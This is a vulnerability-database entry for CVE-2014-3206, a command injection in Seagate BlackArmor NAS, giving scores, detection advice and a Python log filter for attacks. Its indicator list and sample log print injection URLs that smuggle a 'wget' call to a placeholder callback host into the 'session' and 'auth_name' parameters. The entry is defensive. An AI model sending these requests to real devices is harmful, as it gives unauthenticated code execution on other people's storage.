cbcvebase.
CVE-2014-3206
published 2018-02-23

CVE-2014-3206: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name…

Priority: P186 critical, 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 52.89% (98.8th percentile)
Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.

Detection & IOCs (extracted from sources)

url: /backupmgt/localJob.php?session=fail;wget+http://{{interactsh-url}};
url: /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://{{interactsh-url}};
path: /backupmgt/localJob.php
path: /backupmgt/pre_connect_check.php
  • Monitor HTTP GET requests to /backupmgt/localJob.php with a 'session' parameter containing shell metacharacters (e.g., semicolons) indicating command injection attempts.
  • Monitor HTTP GET requests to /backupmgt/pre_connect_check.php with an 'auth_name' parameter containing shell metacharacters (e.g., semicolons) indicating command injection attempts.
  • GreyNoise tags IPs exploiting this CVE as 'Seagate BlackArmor RCE Attempt' with Malicious intention; cross-reference inbound traffic to BlackArmor NAS devices against GreyNoise threat feeds.
  • The exploit uses at most 2 HTTP requests, one to each vulnerable endpoint; detection logic should alert when either path is accessed with injection characters in its query parameters.
  • The NVD entry lists the second vulnerable path as 'localhost/backupmgmt/pre_connect_check.php' (directory spelled 'backupmgmt'), while the Nuclei template uses '/backupmgt/pre_connect_check.php' (directory spelled 'backupmgt'). Detections should cover both path variants.
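
The checks listed above, written as a log filter. This is an added example, not code from the Nuclei template or any vendor: the combined access-log format, the metacharacter set, the function names and the sample lines (documentation IP ranges, placeholder callback host) are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Endpoint -> parameter named in the CVE description. Both directory spellings
# ("backupmgt" and "backupmgmt") are accepted because the sources disagree.
WATCHED = {"localjob.php": "session", "pre_connect_check.php": "auth_name"}
PATH_RE = re.compile(r"^/backupmgm?t/(localjob\.php|pre_connect_check\.php)$", re.I)
SHELL_META = re.compile(r"[;|&`$()<>\n\r]")  # assumed metacharacter set
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def check_request(target):
    """Return (path, param, decoded_value) for a suspicious request target, else None."""
    parts = urlsplit(target)
    m = PATH_RE.match(parts.path)
    if not m:
        return None
    param = WATCHED[m.group(1).lower()]
    # Split on '&' by hand: some query parsers also split on ';', which would
    # cut the injected command out of the value before it is inspected.
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)  # decode %3B, '+', etc. before matching
        if unquote_plus(name) == param and SHELL_META.search(value):
            return (parts.path, param, value)
    return None

def scan(lines):
    """Run check_request over access-log lines and collect the hits."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        hit = check_request(m.group(1)) if m else None
        if hit:
            hits.append(hit)
    return hits

# Constructed sample access-log lines; the last two are benign controls.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:00:00:01 +0000] "GET /backupmgt/localJob.php?session=fail;wget+http://callback.example; HTTP/1.1" 200 0',
    '198.51.100.7 - - [01/Jan/2024:00:00:02 +0000] "GET /backupmgmt/pre_connect_check.php?auth_name=fail%3Bwget+http://callback.example%3B HTTP/1.1" 200 0',
    '192.0.2.10 - - [01/Jan/2024:00:00:03 +0000] "GET /backupmgt/localJob.php?session=abc123 HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:00:00:04 +0000] "GET /index.php?q=a;b HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for path, param, value in scan(SAMPLE_LOG):
        print(f"ALERT {path} {param}={value!r}")
```

Values are URL-decoded before matching, so a percent-encoded semicolon is caught as well as a literal one.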

CVSS provenance

nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck | 9.8 | CRITICAL